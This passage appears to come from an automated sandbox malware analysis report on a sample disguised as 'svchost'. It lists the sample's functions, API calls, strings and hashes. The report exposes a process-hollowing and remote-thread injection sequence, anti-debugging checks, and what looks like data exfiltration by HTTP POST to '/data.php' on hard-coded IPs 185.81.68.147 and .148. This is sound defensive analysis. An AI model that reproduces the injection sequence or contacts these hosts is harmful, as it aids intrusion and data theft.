                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                        • String ID:
                                                                                        • API String ID: 434396405-0
                                                                                        • Opcode ID: bab2983d0c2064314564850c59faab085e0d37512c9f18e1fbfae7b8d179e830
                                                                                        • Instruction ID: 89be0ca0ccb9eeb60e0b3e06d95f20fbb74d970d1b5b5864364db1a45763a75e
                                                                                        • Opcode Fuzzy Hash: bab2983d0c2064314564850c59faab085e0d37512c9f18e1fbfae7b8d179e830
                                                                                        • Instruction Fuzzy Hash: 3C31E57661DA4186D754DB15F49066AB7A0FBC9B44F209036EA8FC3B68DF3DD8458F00
                                                                                        Function 00007FF60BFA0150 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                        • String ID:
                                                                                        • API String ID: 3920101602-0
                                                                                        • Opcode ID: f99d0651fdf556c9b584e72e4d5c1ff9382a0391580ff3d2c9f68253d8046eac
                                                                                        • Instruction ID: fa0e06e83889d1dca8935e43d16cb359a87e9eaf9f157b5d28c7ae4489fe698d
                                                                                        • Opcode Fuzzy Hash: f99d0651fdf556c9b584e72e4d5c1ff9382a0391580ff3d2c9f68253d8046eac
                                                                                        • Instruction Fuzzy Hash: 9AF0586490C18285EB384B20A9083BA6FE0AB4DB8DF208974D58EC72A4CF2CD548DF21
                                                                                        Function 00007FF60BFA0740 Relevance: 4.5, APIs: 3, Instructions: 21synchronizationCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateErrorHandleLastMutex
                                                                                        • String ID:
                                                                                        • API String ID: 4294037311-0
                                                                                        • Opcode ID: 59ab599f7491f754aec7b61761454f8aff9e05966f05be0cfe8a916997727bdf
                                                                                        • Instruction ID: c862e7bc0f7acfd4596ab2ba3c374700bb6da253eb9e42549afecf9b368ae917
                                                                                        • Opcode Fuzzy Hash: 59ab599f7491f754aec7b61761454f8aff9e05966f05be0cfe8a916997727bdf
                                                                                        • Instruction Fuzzy Hash: EFF0A56590CB42A2EA645B60A50436A67A0FB9A740F608535E98FC3664CF3DF4999E00
                                                                                        Function 00007FF60BF9DFBC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 299 7ff60bf9dfbc-7ff60bf9dff8 LoadLibraryA GetProcAddress
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 2574300362-0
                                                                                        • Opcode ID: 0d76b06add167d4cf6fec4a5d31fc7408f5b7e96f421476ee3b93fcabe3639bc
                                                                                        • Instruction ID: 11b498efc9df85965894bc0a0aebf9d7fdc6c757a7e9558577b7558e95399497
                                                                                        • Opcode Fuzzy Hash: 0d76b06add167d4cf6fec4a5d31fc7408f5b7e96f421476ee3b93fcabe3639bc
                                                                                        • Instruction Fuzzy Hash: EBE00276919F8592C6209B15F84401AB7B4F7CD798F605525EACD83B38DF3CC6A58B04
                                                                                        Function 00007FF60BFA0280 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 300 7ff60bfa0280-7ff60bfa028f 301 7ff60bfa0291-7ff60bfa029e VirtualFree 300->301 302 7ff60bfa02a4-7ff60bfa02a8 300->302 301->302
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1263568516-0
                                                                                        • Opcode ID: 092c94a0028451cec1867d66aa68a9feed987baf5a0f91e012113381deae6093
                                                                                        • Instruction ID: 0aaeaa97cc2358ba0d5d2e4933f46c2053911c98aa00c9d624969fb495514fdb
                                                                                        • Opcode Fuzzy Hash: 092c94a0028451cec1867d66aa68a9feed987baf5a0f91e012113381deae6093
                                                                                        • Instruction Fuzzy Hash: B7D01351E3898181D754D716E5557155290FFC8740F50C035E5CAC3574CF3CC095CF00

                                                                                        Non-executed Functions

                                                                                        Function 00007FF60BF9F204 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 445COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 378 7ff60bf9f204-7ff60bf9f287 GetModuleFileNameW 379 7ff60bf9f28e-7ff60bf9f2c7 378->379 380 7ff60bf9f289 378->380 382 7ff60bf9f2df-7ff60bf9f2f8 call 7ff60bf9fb00 379->382 383 7ff60bf9f2c9-7ff60bf9f2d1 379->383 381 7ff60bf9faee-7ff60bf9faf6 380->381 391 7ff60bf9f335-7ff60bf9f33c 382->391 384 7ff60bf9f2d3-7ff60bf9f2db 383->384 385 7ff60bf9f2fa-7ff60bf9f313 call 7ff60bf9fb38 383->385 388 7ff60bf9f315-7ff60bf9f32e call 7ff60bf9fb70 384->388 389 7ff60bf9f2dd-7ff60bf9f330 384->389 385->391 388->391 389->381 396 7ff60bf9f33e 391->396 397 7ff60bf9f343-7ff60bf9f397 CreateProcessW 391->397 396->381 398 7ff60bf9f39e-7ff60bf9f3e4 CreateFileW 397->398 399 7ff60bf9f399 397->399 400 7ff60bf9f3e6 398->400 401 7ff60bf9f3eb-7ff60bf9f404 GetFileSize 398->401 399->381 400->381 402 7ff60bf9f406-7ff60bf9f40b 401->402 403 7ff60bf9f40d-7ff60bf9f41b CloseHandle 401->403 402->403 404 7ff60bf9f420-7ff60bf9f445 VirtualAlloc 402->404 403->381 405 7ff60bf9f447-7ff60bf9f455 CloseHandle 404->405 406 7ff60bf9f45a-7ff60bf9f485 ReadFile 404->406 405->381 407 7ff60bf9f487-7ff60bf9f4a8 VirtualFree CloseHandle 406->407 408 7ff60bf9f4ad-7ff60bf9f4fe CloseHandle GetThreadContext 406->408 407->381 409 7ff60bf9f500-7ff60bf9f513 VirtualFree 408->409 410 7ff60bf9f518-7ff60bf9f5a3 ReadProcessMemory GetModuleHandleA GetProcAddress 408->410 409->381 412 7ff60bf9f5a5-7ff60bf9f5b8 VirtualFree 410->412 413 7ff60bf9f5bd-7ff60bf9f626 VirtualAllocEx 410->413 412->381 414 7ff60bf9f640-7ff60bf9f671 WriteProcessMemory 413->414 415 7ff60bf9f628-7ff60bf9f63b VirtualFree 413->415 416 7ff60bf9f673-7ff60bf9f686 VirtualFree 414->416 417 7ff60bf9f68b-7ff60bf9f693 414->417 415->381 416->381 418 7ff60bf9f69f-7ff60bf9f6ac 417->418 419 7ff60bf9f6b2-7ff60bf9f73b WriteProcessMemory 418->419 420 7ff60bf9f75a-7ff60bf9f79e 418->420 421 7ff60bf9f755 419->421 422 7ff60bf9f73d-7ff60bf9f750 VirtualFree 419->422 423 7ff60bf9f7aa-7ff60bf9f7b7 420->423 421->418 422->381 425 7ff60bf9fa1f-7ff60bf9fa9d WriteProcessMemory SetThreadContext 423->425 426 7ff60bf9f7bd-7ff60bf9f80f RtlCompareMemory 423->426 427 7ff60bf9fa9f-7ff60bf9fab2 VirtualFree 425->427 428 7ff60bf9fab4-7ff60bf9fac4 ResumeThread 425->428 429 7ff60bf9f811 426->429 430 7ff60bf9f813-7ff60bf9f843 426->430 427->381 432 7ff60bf9fac6-7ff60bf9fad9 VirtualFree 428->432 433 7ff60bf9fadb-7ff60bf9fae8 VirtualFree 428->433 429->423 434 7ff60bf9f84b-7ff60bf9f856 430->434 432->381 433->381 435 7ff60bf9fa1a 434->435 436 7ff60bf9f85c-7ff60bf9f8d8 434->436 435->425 437 7ff60bf9f8e4-7ff60bf9f8ef 436->437 438 7ff60bf9fa15 437->438 439 7ff60bf9f8f5-7ff60bf9f91f 437->439 438->434 440 7ff60bf9f921 439->440 441 7ff60bf9f923-7ff60bf9f9f6 ReadProcessMemory WriteProcessMemory 439->441 440->437 443 7ff60bf9fa10 441->443 444 7ff60bf9f9f8-7ff60bf9fa0b VirtualFree 441->444 443->438 444->381
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleName
                                                                                        • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                        • API String ID: 514040917-3001742581
                                                                                        • Opcode ID: b908c4bbb58855851690610d9eaba40de91e681cb9da683074f69fec9867cf37
                                                                                        • Instruction ID: 5f4b452fcec7149987a586b8298cd5197529815ca120d6066935c43795ec1f4c
                                                                                        • Opcode Fuzzy Hash: b908c4bbb58855851690610d9eaba40de91e681cb9da683074f69fec9867cf37
                                                                                        • Instruction Fuzzy Hash: 0132CB3260CA8186E7A4DF15E4547AAB7A1FBC8794F508135DA8EC3B68DF7CE445CB00
                                                                                        Function 00007FF60BFA3B98 Relevance: 21.1, APIs: 14, Instructions: 146COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$Info$__crt$_calloc_crtfree$A_statErrorLastSleepUpdateUpdate::__calloc_impl_invoke_watson
                                                                                        • String ID:
                                                                                        • API String ID: 411824461-0
                                                                                        • Opcode ID: 564419ca50e371d3acc34bb99ed49dc042e36028f0c6e1de800d56395efabe84
                                                                                        • Instruction ID: 0ceef4bb37d04411a916b5bbafbc55895a1c747c1921b7b145eeb3d6ecdbd97b
                                                                                        • Opcode Fuzzy Hash: 564419ca50e371d3acc34bb99ed49dc042e36028f0c6e1de800d56395efabe84
                                                                                        • Instruction Fuzzy Hash: 065126A1B1C28341FB689A26A81177A52D16F9DBC4F24C035DE0FC7BA6EE3CE4058B04
                                                                                        Function 00007FF60BF810D4 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: OpenProcess
                                                                                        • String ID: $@$RtlCreateUserThread$ntdll
                                                                                        • API String ID: 3743895883-721857904
                                                                                        • Opcode ID: 997f9696530ca3d2e2a924b5a8e3b77fe72128a8fbc0c0d691b2ed488240cbf6
                                                                                        • Instruction ID: a35d7a3fed00e61f0616109d0fe2e6a4ce09221257c051f7a62dfdd8f794da11
                                                                                        • Opcode Fuzzy Hash: 997f9696530ca3d2e2a924b5a8e3b77fe72128a8fbc0c0d691b2ed488240cbf6
                                                                                        • Instruction Fuzzy Hash: 6071003190CB8186E7608B56F44436AB7A0F78D794F208635E68ED7BA8DFBCD595CB00
                                                                                        Function 00007FF60BF824E8 Relevance: 10.6, APIs: 7, Instructions: 137memoryinjectionCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocMemoryProcessVirtualWrite
                                                                                        • String ID:
                                                                                        • API String ID: 645232735-0
                                                                                        • Opcode ID: 9846827d6b8e06299e9a05d4f878c346567fa6bf18a5ac3c9d23b35c2b6f147d
                                                                                        • Instruction ID: 1d9a6811dd7e5f23293e49e0689e2cbb61beb398a45980843407b416f818cf22
                                                                                        • Opcode Fuzzy Hash: 9846827d6b8e06299e9a05d4f878c346567fa6bf18a5ac3c9d23b35c2b6f147d
                                                                                        • Instruction Fuzzy Hash: 8F719636658B4586DB50CB1AE49072AABA1F789BC4F109135EE8EC3B78DF7CE444CB40
                                                                                        Function 00007FF60BF9EC18 Relevance: 59.7, APIs: 24, Strings: 10, Instructions: 163networksleepstringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectSendSleepstrlen
                                                                                        • String ID: /data.php$185.81.68.147$185.81.68.148$Content-Type: application/x-www-form-urlencodedConnection: close$Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0$POST$data=$err$err$err
                                                                                        • API String ID: 2240106504-3235050614
                                                                                        • Opcode ID: 28471d85fd49d0bd5f3af11c198ae44d0fa0b724d49c512276e690abd95f61e1
                                                                                        • Instruction ID: f6d1ff2478b6b6b08f0bab7e1ba0aee5c7cac93f9a50fd7953da2da3f684daf4
                                                                                        • Opcode Fuzzy Hash: 28471d85fd49d0bd5f3af11c198ae44d0fa0b724d49c512276e690abd95f61e1
                                                                                        • Instruction Fuzzy Hash: 29919536A0CA4196E710DB15F59476AB7A0FB89794F208435EA8EC7B78DF7DD488CB00
                                                                                        Function 00007FF60BF9EF58 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF60BF9EF95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocFileProcessRead
                                                                                        • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                        • API String ID: 4279794846-2771526726
                                                                                        • Opcode ID: c286b5aeaee3a95e6f793a4cad3823bc7d6503c806200300204d2a70b13d1204
                                                                                        • Instruction ID: 8bd06f77063229739a68dcdd9fbeb5c98e9d9fcbb3a2dd387b6c30f8d640c905
                                                                                        • Opcode Fuzzy Hash: c286b5aeaee3a95e6f793a4cad3823bc7d6503c806200300204d2a70b13d1204
                                                                                        • Instruction Fuzzy Hash: 6071C53262CA8186E7508F14F95472AB770FBC9794F209435EA8BC7B68CF7DD4848B00
                                                                                        Function 00007FF60BF82314 Relevance: 36.8, APIs: 11, Strings: 10, Instructions: 65libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 490 7ff60bf82314-7ff60bf82330 LoadLibraryA 491 7ff60bf82337-7ff60bf82420 GetProcAddress * 9 490->491 492 7ff60bf82332 490->492 494 7ff60bf82472-7ff60bf82477 FreeLibrary 491->494 495 7ff60bf82422-7ff60bf8242a 491->495 493 7ff60bf8247d-7ff60bf82481 492->493 494->493 495->494 496 7ff60bf8242c-7ff60bf82434 495->496 496->494 497 7ff60bf82436-7ff60bf8243e 496->497 497->494 498 7ff60bf82440-7ff60bf82448 497->498 498->494 499 7ff60bf8244a-7ff60bf82452 498->499 499->494 500 7ff60bf82454-7ff60bf8245c 499->500 500->494 501 7ff60bf8245e-7ff60bf82466 500->501 501->494 502 7ff60bf82468-7ff60bf82470 501->502 502->493 502->494
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                        • String ID: NtClose$NtCreateSection$NtMapViewOfSection$NtOpenFile$NtSetInformationFile$NtSetInformationProcess$NtWriteFile$RtlAdjustPrivilege$RtlInitUnicodeString$ntdll.dll
                                                                                        • API String ID: 2449869053-1333963010
                                                                                        • Opcode ID: 3b84ecef7e8c75bcd1d12f9525db118f6743ea869c907afc9188f40934af8a68
                                                                                        • Instruction ID: c2bb621d3ccd2ec1cc4cfff4d27757d487c2f0908607857ba7777f1c7d0f9755
                                                                                        • Opcode Fuzzy Hash: 3b84ecef7e8c75bcd1d12f9525db118f6743ea869c907afc9188f40934af8a68
                                                                                        • Instruction Fuzzy Hash: 9B418F3591DA02A5EA619B09E94477573B0FF8CB86F209636C49FC32B5DF7CA588C340
                                                                                        Function 00007FF60BF81B30 Relevance: 30.2, APIs: 20, Instructions: 169COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: dd1db8065b8b72934f9a832ddd55b7f2970ebeaf73aedca523161806716b0cef
                                                                                        • Instruction ID: 2b659a5b6b27e6e34770e237606294b297b7a8f9b6c5cbbe9574203b2df6c3a3
                                                                                        • Opcode Fuzzy Hash: dd1db8065b8b72934f9a832ddd55b7f2970ebeaf73aedca523161806716b0cef
                                                                                        • Instruction Fuzzy Hash: A191DE7250C68196EB50CB16E45476AB7A1FB8C784F204535D68FC7A78DF7CE545CB00
                                                                                        Function 00007FF60BF9DA34 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 94networkCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$Open$CloseHandle
                                                                                        • String ID: Mozilla/5.0
                                                                                        • API String ID: 3289985339-2630049532
                                                                                        • Opcode ID: d808c079d8e75f8a4ac68c4773e767ace300b3f5636902ee28373f7788d6eb60
                                                                                        • Instruction ID: 0f895eae208546c709661d899a06dad03355a424d7af94c340c6b489f7cc6e0d
                                                                                        • Opcode Fuzzy Hash: d808c079d8e75f8a4ac68c4773e767ace300b3f5636902ee28373f7788d6eb60
                                                                                        • Instruction Fuzzy Hash: 3851A73691CA42C6E7109F15E45472AB760FBC9B94F208135EA9BC7AB8CF7DD454CB00
                                                                                        Function 00007FF60BF817C4 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 161libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
